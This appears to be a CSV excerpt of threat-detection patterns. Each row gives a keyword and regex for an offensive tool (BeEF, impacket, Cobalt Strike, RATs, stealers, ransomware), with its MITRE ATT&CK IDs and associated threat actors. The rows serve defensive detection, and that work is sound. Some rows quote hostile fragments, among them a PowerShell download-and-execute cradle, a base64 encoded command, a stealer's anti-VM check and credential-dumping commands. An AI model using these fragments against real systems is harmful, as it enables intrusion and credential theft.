"*ie_win_htapowershell.*",".{0,1000}ie_win_htapowershell\..{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","48203"
"*ie_win_missingflash-prettytheft*",".{0,1000}ie_win_missingflash\-prettytheft.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","48204"
"*iepv.exe /stext *",".{0,1000}iepv\.exe\s\/stext\s.{0,1000}","offensive_tool_keyword","IEPassView","IE PassView scans all Internet Explorer passwords in your system and display them on the main window.","T1555 - T1212","TA0006","N/A","BlackSuit - Royal - GoGoogle - XDSpy","Credential Access","https://www.nirsoft.net/utils/internet_explorer_password.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","48205"
"*IERMTCBpbnRvIHByb2Nlc3MgOiA=*",".{0,1000}IERMTCBpbnRvIHByb2Nlc3MgOiA\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","48206"
"*iex(new-object net.webclient).downloadstring(*/pwv.ps1*",".{0,1000}iex\(new\-object\snet\.webclient\)\.downloadstring\(.{0,1000}\/pwv\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","48208"
"*If no process provided, it will attempt to inject into explorer.exe*",".{0,1000}If\sno\sprocess\sprovided,\sit\swill\sattempt\sto\sinject\sinto\sexplorer\.exe.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","N/A","10","8","700","83","2025-01-26T08:05:48Z","2023-04-05T09:39:33Z","48212"
"*if os.getlogin() in [""WDAGUtilityAccount"",""Abby"",""Peter Wilson"",""hmarc"",""patex"",""JOHN-PC"",""RDhJ0CNFevzX"",""kEecfMwgj"",""Frank"",""8Nl0ColNQ5bq""*",".{0,1000}if\sos\.getlogin\(\)\sin\s\[\""WDAGUtilityAccount\"",\""Abby\"",\""Peter\sWilson\"",\""hmarc\"",\""patex\"",\""JOHN\-PC\"",\""RDhJ0CNFevzX\"",\""kEecfMwgj\"",\""Frank\"",\""8Nl0ColNQ5bq\"".{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","N/A","10","","N/A","","","","48213"
"*If the attack is successful* you will see authentication logs of machines retrieving and executing the malicious GPO*",".{0,1000}If\sthe\sattack\sis\ssuccessful.{0,1000}\syou\swill\ssee\sauthentication\slogs\sof\smachines\sretrieving\sand\sexecuting\sthe\smalicious\sGPO.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","48214"
"*If x.ProcessName = ""ProcessHacker"" *",".{0,1000}If\sx\.ProcessName\s\=\s\""ProcessHacker\""\s.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","N/A","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","48215"
"*If XWorm Does Not work - Run This Script As Administrator!*",".{0,1000}If\sXWorm\sDoes\sNot\swork\s\-\sRun\sThis\sScript\sAs\sAdministrator!.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","#content","N/A","10","","N/A","","","","48216"
"*If you do not pay the ransom, we will attack your company again in the future*",".{0,1000}If\syou\sdo\snot\spay\sthe\sransom,\swe\swill\sattack\syour\scompany\sagain\sin\sthe\sfuture.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","48217"
"*if you do not use masscan you can't give me CIDR as input*",".{0,1000}if\syou\sdo\snot\suse\smasscan\syou\scan\'t\sgive\sme\sCIDR\sas\sinput.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","N/A","7","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","48218"
"*IgBJAHMAIABFAGwAZQB2AGEAdABlAGQAOgAgACQAKAAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAFAAcgBpAG4AYwBpAHAAYQBsAF0AWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMASQBkAGUAbgB0AGkAdAB5AF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAKAApACkALgBJAHMASQBuAFIAbwBsAGUAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBCAHUAaQBsAHQASQBuAFIAbwBsAGUAXQAnAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAJwApACkAIAAtACAAJAAoAEcAZQB0AC0ARABhAHQAZQApACIAIAB8ACAATwB1AHQALQBGAGkAbABlACAAQwA6AFwAVQBBAEMAQgB5AHAAYQBzAHMAVABlAHMAdAAuAHQAeAB0ACAALQBBAHAAcABlAG4AZAA=*",".{0,1000}IgBJAHMAIABFAGwAZQB2AGEAdABlAGQAOgAgACQAKAAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAFAAcgBpAG4AYwBpAHAAYQBsAF0AWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMASQBkAGUAbgB0AGkAdAB5AF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAKAApACkALgBJAHMASQBuAFIAbwBsAGUAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBCAHUAaQBsAHQASQBuAFIAbwBsAGUAXQAnAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAJwApACkAIAAtACAAJAAoAEcAZQB0AC0ARABhAHQAZQApACIAIAB8ACAATwB1AHQALQBGAGkAbABlACAAQwA6AFwAVQBBAEMAQgB5AHAAYQBzAHMAVABlAHMAdAAuAHQAeAB0ACAALQBBAHAAcABlAG4AZAA\=.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","0","#base64","N/A","10","10","91","20","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z","48224"
"*Ignitetechnologies/Persistence-Accessibility-Features*",".{0,1000}Ignitetechnologies\/Persistence\-Accessibility\-Features.{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","1","N/A","N/A","9","1","34","12","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z","48225"
"*ihamburglar/fgdump*",".{0,1000}ihamburglar\/fgdump.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://github.com/ihamburglar/fgdump","1","1","N/A","N/A","10","1","8","4","2012-01-14T19:05:42Z","2015-10-11T17:08:47Z","48226"
"*IIS-Backdoor.*",".{0,1000}IIS\-Backdoor\..{0,1000}","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","1","N/A","N/A","10","10","541","124","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z","48227"
"*IIS-Raid-master*",".{0,1000}IIS\-Raid\-master.{0,1000}","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","1","N/A","N/A","10","10","541","124","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z","48228"
"*iisreset.exe /stop*",".{0,1000}iisreset\.exe\s\/stop.{0,1000}","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","N/A","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","FIN7","10","10","N/A","N/A","N/A","N/A","48229"
"*ijacbjjjpmhencpkoghphdgbooifplmn*",".{0,1000}ijacbjjjpmhencpkoghphdgbooifplmn.{0,1000}","offensive_tool_keyword","Shwmae","Shwmae is a tool focused on Windows Hello and DPAPI exploitation. It enables the enumeration - extraction and manipulation of Windows Hello keys and credentials","T1068 - T1078 - T1211 - T1003.004 - T1003.005 - T1003.002","TA0006 - TA0005 - TA0003  - TA0004","N/A","N/A","Credential Access","https://github.com/CCob/Shwmae","1","0","#browser_extensionid","N/A","7","2","149","12","2025-01-27T14:36:07Z","2024-03-21T15:05:03Z","48230"
"*IKEEXT DLL Hijacking*",".{0,1000}IKEEXT\sDLL\sHijacking.{0,1000}","offensive_tool_keyword","Ikeext-Privesc","Windows IKEEXT DLL Hijacking Exploit Tool","T1546.011 - T1574.009 - T1036.004","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/securycore/Ikeext-Privesc","1","0","N/A","N/A","10","1","33","52","2018-02-25T13:45:15Z","2018-02-27T11:18:56Z","48231"
"*Ikeext-Privesc.ps1*",".{0,1000}Ikeext\-Privesc\.ps1.{0,1000}","offensive_tool_keyword","Ikeext-Privesc","Windows IKEEXT DLL Hijacking Exploit Tool","T1546.011 - T1574.009 - T1036.004","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/securycore/Ikeext-Privesc","1","1","N/A","N/A","10","1","33","52","2018-02-25T13:45:15Z","2018-02-27T11:18:56Z","48232"
"*ikeforce.py*",".{0,1000}ikeforce\.py.{0,1000}","offensive_tool_keyword","IKEForce","IKEForce is a command line IPSEC VPN brute forcing tool for Linux that allows group name/ID enumeration and XAUTH brute forcing capabilities.","T1110 - T1201 - T1018","TA0001 - TA0002 - TA0007","N/A","N/A","Exploitation tool","https://github.com/SpiderLabs/ikeforce","1","1","#linux","N/A","N/A","3","241","73","2019-09-18T09:35:41Z","2014-09-12T01:11:00Z","48233"
"*ikescan2john.py*",".{0,1000}ikescan2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","48234"
"*ILBypass.ps1*",".{0,1000}ILBypass\.ps1.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1059.001 - T1105 - T1071.001 - T1219 - T1573","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","N/A","10","10","750","156","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z","48235"
"*Imanfeng/Telemetry*",".{0,1000}Imanfeng\/Telemetry.{0,1000}","offensive_tool_keyword","Telemetry","Abusing Windows Telemetry for persistence through registry modifications and scheduled tasks to execute arbitrary commands with system-level privileges.","T1053 - T1547 - T1059","TA0003 - TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/Imanfeng/Telemetry","1","1","N/A","N/A","9","2","140","13","2020-07-02T09:41:27Z","2020-06-24T16:30:44Z","48236"
"*imaohw/nib/rsu/*",".{0,1000}imaohw\/nib\/rsu\/.{0,1000}","offensive_tool_keyword","whoami","whoami is a legitimate command used to identify the current user executing the command in a terminal or command prompt.whoami can be used to gather information about the current user's privileges. credentials. and account name. which can then be used for Lateral Movement. privilege escalation. or targeted attacks within the compromised network.","T1003.001 - T1087 - T1057 ","TA0006 - TA0007","N/A","Black Basta","Collection","N/A","1","0","N/A","N/A","N/A","10","N/A","N/A","N/A","N/A","48237"
"*imapattack.py*",".{0,1000}imapattack\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","48238"
"*imapattack.py*",".{0,1000}imapattack\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48239"
"*imaprelayclient.py*",".{0,1000}imaprelayclient\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","48240"
"*imaprelayclient.py*",".{0,1000}imaprelayclient\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48241"
"*IMDS Service Spoofing Enabled*",".{0,1000}IMDS\sService\sSpoofing\sEnabled.{0,1000}","offensive_tool_keyword","IMDSpoof","IMDSPOOF is a cyber deception tool that spoofs the AWS IMDS service to return HoneyTokens that can be alerted on.","T1584 - T1204 - T1078 - T1558","TA0007 - TA0001 - TA0002 - TA0004","N/A","N/A","Sniffing & Spoofing","https://github.com/grahamhelton/IMDSpoof","1","0","N/A","N/A","8","2","101","3","2023-11-24T23:42:48Z","2023-11-24T23:21:21Z","48242"
"*IMDSPoof Honey Token*",".{0,1000}IMDSPoof\sHoney\sToken.{0,1000}","offensive_tool_keyword","IMDSpoof","IMDSPOOF is a cyber deception tool that spoofs the AWS IMDS service to return HoneyTokens that can be alerted on.","T1584 - T1204 - T1078 - T1558","TA0007 - TA0001 - TA0002 - TA0004","N/A","N/A","Sniffing & Spoofing","https://github.com/grahamhelton/IMDSpoof","1","0","N/A","N/A","8","2","101","3","2023-11-24T23:42:48Z","2023-11-24T23:21:21Z","48243"
"*IMDSpoof*IMDS.go*",".{0,1000}IMDSpoof.{0,1000}IMDS\.go.{0,1000}","offensive_tool_keyword","IMDSpoof","IMDSPOOF is a cyber deception tool that spoofs the AWS IMDS service to return HoneyTokens that can be alerted on.","T1584 - T1204 - T1078 - T1558","TA0007 - TA0001 - TA0002 - TA0004","N/A","N/A","Sniffing & Spoofing","https://github.com/grahamhelton/IMDSpoof","1","0","N/A","N/A","8","2","101","3","2023-11-24T23:42:48Z","2023-11-24T23:21:21Z","48244"
"*IMDSpoof-main*",".{0,1000}IMDSpoof\-main.{0,1000}","offensive_tool_keyword","IMDSpoof","IMDSPOOF is a cyber deception tool that spoofs the AWS IMDS service to return HoneyTokens that can be alerted on.","T1584 - T1204 - T1078 - T1558","TA0007 - TA0001 - TA0002 - TA0004","N/A","N/A","Sniffing & Spoofing","https://github.com/grahamhelton/IMDSpoof","1","1","N/A","N/A","8","2","101","3","2023-11-24T23:42:48Z","2023-11-24T23:21:21Z","48245"
"*imgproxy.dev.pico.sh*",".{0,1000}imgproxy\.dev\.pico\.sh.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","1","N/A","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","48246"
"*im-hanzou/Arbitrium-RAT*",".{0,1000}im\-hanzou\/Arbitrium\-RAT.{0,1000}","offensive_tool_keyword","Arbitrium-RAT","cross-platform fully undetectable remote access trojan to control Android Windows and Linux","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","N/A","Malware","https://github.com/im-hanzou/Arbitrium-RAT","1","1","N/A","N/A","10","4","355","309","2021-01-15T23:21:13Z","2021-01-16T03:03:11Z","48247"
"*imp_Badger*",".{0,1000}imp_Badger.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","48248"
"*impacket minikerberos*",".{0,1000}impacket\sminikerberos.{0,1000}","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550.003 - T1557.002 - T1552.004 - T1212 - T1550","TA0009 - TA0008","N/A","N/A","Lateral Movement","https://github.com/dirkjanm/PKINITtools","1","0","N/A","N/A","N/A","8","737","82","2025-01-03T14:25:52Z","2021-07-27T19:06:09Z","48249"
"*impacket*",".{0,1000}impacket.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch. as well as parsed from raw data. and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48250"
"*impacket*",".{0,1000}impacket.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch. as well as parsed from raw data. and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library.","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48251"
